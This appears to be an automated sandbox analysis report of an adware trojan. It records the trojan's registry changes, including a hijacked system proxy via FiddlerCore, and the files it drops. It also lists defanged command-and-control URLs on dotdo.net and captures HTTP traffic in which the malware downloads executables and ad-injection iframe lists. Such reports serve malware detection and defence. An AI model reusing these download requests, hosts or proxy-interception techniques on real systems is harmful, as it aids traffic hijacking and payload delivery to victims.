The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 C6 DC 95 84 7B 63 AD 75 FE 0B 86 40 63 18 D4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process internetport3.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 03 00 00 00 29 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 04 00 00 00 03 00 00 00 29 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877;"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 9D 97 76 20 1A 37 73 3E 91 C7 A1 0E AF 5F 2C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\FiddlerCore\Dynamic]
"Attached" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level"

Dropped PE files

MD5 File path
a632e8db250976257ee2e73d658ada12 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa10.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa10.tmp\inetc.dll
acc2b699edfea5bf5aae45aba3a41e96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa10.tmp\nsExec.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsaB.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsaB.tmp\inetc.dll
acc2b699edfea5bf5aae45aba3a41e96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsaB.tmp\nsExec.dll
8614c450637267afacad1645e23ba24a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd8.tmp\FindProcDLL.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd8.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd8.tmp\inetc.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsnE.tmp\System.dll
8614c450637267afacad1645e23ba24a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr6.tmp\FindProcDLL.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr6.tmp\System.dll
99f345cf51b6c3c317d20a81acb11012 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsuA.tmp\KillProcDLL.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsuA.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsuA.tmp\inetc.dll
2df723b3cb50a002fca6e8c63a7a487f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\qPAyENSREpdiRdy4l7PC[1].exe
a632e8db250976257ee2e73d658ada12 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\vchk[1].exe
cb6a1aa1be943fd5aa85bd18708f759b c:\Program Files\FastInternet\app.exe
29ff2eda9ef60448c67860c675175072 c:\Program Files\FastInternet\dotuninstall.exe
42badc1d2f03a8b1e4875740d3d49336 c:\a\7za.exe
b19e81fc91a71a7222e63ea4f09771af c:\a\FiddlerCore.dll
da9dbf01355305af60037cd13ccf2968 c:\a\getcap.exe
2943023b33bb769d64721d4edccbd00b c:\a\internetport3.exe
2df723b3cb50a002fca6e8c63a7a487f c:\a\qPAyENSREpdiRdy4l7PC.exe
e703835506e5dab34f20b5b496a38f72 c:\a\wcheckf.exe
813d46d64e42bf222676084e12e2e80d c:\a\wincheckfe.exe
7988bca8dfaacb79579fd000a31e69cf c:\a\winonit.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 65536 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 258048 2528 2560 3.12403 3333d5ca3c163ed95562eb98d8231779

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 10
6e9a02e45ff743e1e4fadd370e2903eb
aba7046b8baa12b2f0d4c8e67c5ee5dc
870adaabb0d08155f2e2f0d0d5111c82
71cc6609b8db5735ef1d0cf991f0ee49
b8c773eb87a0e41fc08ac983d38eaae0
48423276abbd0ba36915f6c270ce2246
d433981901923cfc7761708c0a8c1bba
c9011de3725d8bff7315a68c4adbad5b
6f36ebfe9bcdb0e9ce78f8200cc42804
2c6ca3869994304875f192b610227269

URLs

URL IP
hxxp://dotdo.net/cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877 81.17.31.2
hxxp://dotdo.net/act/bdcount.ini?uniqueid=qPAyENSREpdiRdy4l7PC&type=1&reg=3215049.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=1 81.17.31.2
hxxp://dotdo.net/act/uniqueqPAyENSREpdiRdy4l7PC.ini?rd=1 81.17.31.2
hxxp://dotdo.net/act/exesbununique/qPAyENSREpdiRdy4l7PC.exe 81.17.31.2
hxxp://dotdo.net/ckkk.html 81.17.31.2
hxxp://dotdo.net/act/txt/uur.txt 81.17.31.2
hxxp://dotdo.net/act/txt/vv.txt 81.17.31.2
hxxp://dotdo.net/act/exevc/vchk.exe 81.17.31.2
hxxp://dotdo.net/act/txt/vchk.txt 81.17.31.2
hxxp://dotdo.net/ckkkp.html 81.17.31.2
hxxp://dotap.dotdo.net/act/bdcount.ini?uniqueid=qPAyENSREpdiRdy4l7PC&type=1&reg=3215049.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=1 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/vv.txt 81.17.31.2
hxxp://dotap.dotdo.net/act/uniqueqPAyENSREpdiRdy4l7PC.ini?rd=1 81.17.31.2
hxxp://dotap.dotdo.net/act/exesbununique/qPAyENSREpdiRdy4l7PC.exe 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/vchk.txt 81.17.31.2
hxxp://dotap.dotdo.net/act/exevc/vchk.exe 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/uur.txt 81.17.31.2
fp0.dotdo.net 109.123.123.124


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Traffic

GET /act/txt/vchk.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:25 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
276b..mpck_gb_26.exe.upmpck_gb_26.exe.LuckyTab.exe.MaxComputerCleaner_
Maintenance.exe.ospd_us_1080.exe.upmbot_gb_571.exe.Setup_product_26943
.exe.SwiftRecord.expext.exe.SwiftRecord.BOASHelper.exe.SwiftRecord.BOA
SPRT.exe.SwiftRecord.BOAS.exe.SwiftRecord.BrowserAdapter.exe.TriplePos
e.expext.exe.TriplePose.BOASHelper.exe.TriplePose.BOASPRT.exe.TriplePo
se.BOAS.exe.TriplePose.BrowserAdapter.exe.FragileFixer.expext.exe.Frag
ileFixer.BOASHelper.exe.FragileFixer.BOASPRT.exe.FragileFixer.BOAS.exe
.FragileFixer.BrowserAdapter.exe.SimpleforYou.expext.exe.SimpleforYou.
BOASHelper.exe.SimpleforYou.BOASPRT.exe.SimpleforYou.BOAS.exe.Simplefo
rYou.BrowserAdapter.exe.Hatchiho.expext.exe.Hatchiho.BOASHelper.exe.Ha
tchiho.BOASPRT.exe.Hatchiho.BOAS.exe.Hatchiho.BrowserAdapter.exe.Mount
ainBike.expext.exe.MountainBike.BOASHelper.exe.MountainBike.BOASPRT.ex
e.MountainBike.BOAS.exe.MountainBike.BrowserAdapter.exe.EduApp.expext.
exe.EduApp.BOASHelper.exe.EduApp.BOASPRT.exe.EduApp.BOAS.exe.EduApp.Br
owserAdapter.exe.innoApp.expext.exe.innoApp.BOASHelper.exe.innoApp.BOA
SPRT.exe.innoApp.BOAS.exe.innoApp.BrowserAdapter.exe.SpecialBox.expext
.exe.SpecialBox.BOASHelper.exe.SpecialBox.BOASPRT.exe.SpecialBox.BOAS.
exe.SpecialBox.BrowserAdapter.exe.BetweenLines.expext.exe.BetweenLines
.BOASHelper.exe.BetweenLines.BOASPRT.exe.BetweenLines.BOAS.exe.Between
Lines.BrowserAdapter.exe.EnhanceTronic.expext.exe.EnhanceTronic.BOASHe
lper.exe.EnhanceTronic.BOASPRT.exe.EnhanceTronic.BOAS.exe.EnhanceTroni
c.BrowserAdapter.exe.MetalMaker.expext.exe.MetalMaker.BOASHelper.e
<<< skipped >>>


GET /ckkk.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:21 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT
ETag: "1d6000000029282-91-50a497515eff0"
Accept-Ranges: bytes
Content-Length: 145
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<title>Untitled</title>..<
/head>..<body>..</body>..</html>..HTTP/1.1 200 OK
..Date: Sat, 22 Aug 2015 11:00:21 GMT..Server: Apache/2.2.22 (Win64) P
HP/5.3.13..Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT..ETag: "1d6000
000029282-91-50a497515eff0"..Accept-Ranges: bytes..Content-Length: 145
..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type
: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitio
nal//EN">..<html>..<head>..<title>Untitled</ti
tle>..</head>..<body>..</body>..</html>..font>....



GET /act/txt/uur.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:23 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 2039
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
VVV.download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.h
tml..download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.
html..VVV.filehippo.com/download_malwarebytes_anti_malware..filehippo.
com/download_malwarebytes_anti_malware..majorgeeks.com/files/details/m
alwarebytes_anti_malware.html..VVV.majorgeeks.com/files/details/malwar
ebytes_anti_malware.html..VVV.microsoft.com/en-us/download/confirmatio
n.aspx?id=9905..microsoft.com/en-us/download/confirmation.aspx?id=9905
..ads.pubmatic.com/AdServer/js/showad.js..download.cnet.com/Comodo-Int
ernet-Security-Premium/3000-2239_4-10460704.html..filehippo.com/downlo
ad_comodo..VVV.filehippo.com/download_comodo..VVV.tomsguide.com/us/dow
nload/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..toms
guide.com/us/download/Comodo-Antivirus-Firewall-internet-security,0301
-6605.html..VVV.pcmag.com/article2/0,2817,2457135,00.asp..pcmag.com/ar
ticle2/0,2817,2457135,00.asp..ads.pubmatic.com/AdServer/js/showad.js..
b.scorecardresearch.com/beacon.js..d.gettvwizard.com/l/load.js..d.inst
ashareonline.com/l/load.js..apiboxrockinfo-a.akamaihd.net/gsrs?is=EF23
DDUS&bp=PB3&g=a636a08d-c0be-4314-b676-974f8a821dce..VVV.filehippo.com/
download_malwarebytes_anti_malware..filehippo.com/download_malwarebyte
s_anti_malware..VVV.filehippo.com/download_malwarebytes_anti_malware/5
9476..filehippo.com/download_malwarebytes_anti_malware/59476..origin.l
anguages.malwarebytes.org/downloads/..download.cnet.com/Malwarebytes-A
nti-Malware/3000-8022_4-10804572.html..tech-support-experts.com/cp
<<< skipped >>>

GET /act/txt/vv.txt HTTP/1.1


User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:23 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
5cea..all;;;;;;;;;;;<div class="mapAndAttrs">;;;;;;;;;;;<div 
class="mapAndAttrs"><iframe width="300" height="250" scrolling=n
o frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.do
tdo.net/adss/indexR.php?size=300x250 id="ddttttr"></iframe>..
all;;;;;;;;;;;<button class="reply_button js-only">;;;;;;;;;;;&l
t;br><iframe width="728" height="90" scrolling=no frameborder=0 
scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/ind
exR.php?size=728x90 id="ddttttr"></iframe><br><butto
n class="reply_button js-only">..all;;;;;;;;;;;<header class="bc
head">;;;;;;;;;;;<br><iframe width="728" height="90" scrol
ling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://a
dss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe&
gt;<br><header class="bchead">..all;;;;;;;;;;;<ul class
="clfooter">;;;;;;;;;;;<br><iframe width="728" height="90"
 scrolling=no frameborder=0 scrolling=no allowtransparency=true src=ht
tp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></i
frame><br><ul class="clfooter">..installpath.com;;;;;;;
;;;;<div style="margin:0 auto; width:320px; height:270px;">;;;;;
;;;;;;<iframe width="850" height="480" scrolling=no frameborder=0 s
crolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/inde
xRB.php?a=11 id="ddttttr"></iframe>..VVV.installpath.com;;;;;
;;;;;;<div style="margin:0 auto; width:320px; height:270px;">
<<< skipped >>>


GET /act/exevc/vchk.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:23 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Wed, 19 Aug 2015 17:31:58 GMT
ETag: "16a000000026349-ddb0-51dad696a4296"
Accept-Ranges: bytes
Content-Length: 56752
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET /ckkkp.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 11:00:28 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT
ETag: "100000000026c77-9f-508fdd8811aa8"
Accept-Ranges: bytes
Content-Length: 159
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<title>Untitled</title>..<
/head>..<body>....<mamoba>..</body>..</html>
;..HTTP/1.1 200 OK..Date: Sat, 22 Aug 2015 11:00:28 GMT..Server: Apach
e/2.2.22 (Win64) PHP/5.3.13..Last-Modified: Sat, 29 Nov 2014 11:40:35 
GMT..ETag: "100000000026c77-9f-508fdd8811aa8"..Accept-Ranges: bytes..C
ontent-Length: 159..Keep-Alive: timeout=5, max=100..Connection: Keep-A
live..Content-Type: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD H
TML 4.01 Transitional//EN">..<html>..<head>..<title&
gt;Untitled</title>..</head>..<body>....<mamoba&g
t;..</body>..</html>....



GET /cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877 HTTP/1.1
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 10:59:55 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 11
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
...googgood..



GET /act/bdcount.ini?uniqueid=qPAyENSREpdiRdy4l7PC&type=1®=3215049.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 10:59:57 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
[a]..v=6....


GET /act/uniqueqPAyENSREpdiRdy4l7PC.ini?rd=1 HTTP/1.1


User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 10:59:58 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
[a]..v=yes....


GET /act/exesbununique/qPAyENSREpdiRdy4l7PC.exe HTTP/1.1


User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 22 Aug 2015 10:59:58 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Tue, 26 May 2015 16:50:52 GMT
ETag: "100000000026a66-dfa3-516feede835a3;509b7b7bbf620"
Accept-Ranges: bytes
Content-Length: 57251
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

wincheckfe.exe_1024:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\FindProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\FindProcDLL.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp\FindProcDLL.dll
.reloc
Kernel32.DLL
PSAPI.DLL
FindProcDLL.dll
System.dll
callback%d
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr6.tmp
nsr6.tmp
C:\a\wincheckfe.exe
wincheckfe.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

qPAyENSREpdiRdy4l7PC.exe_752:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
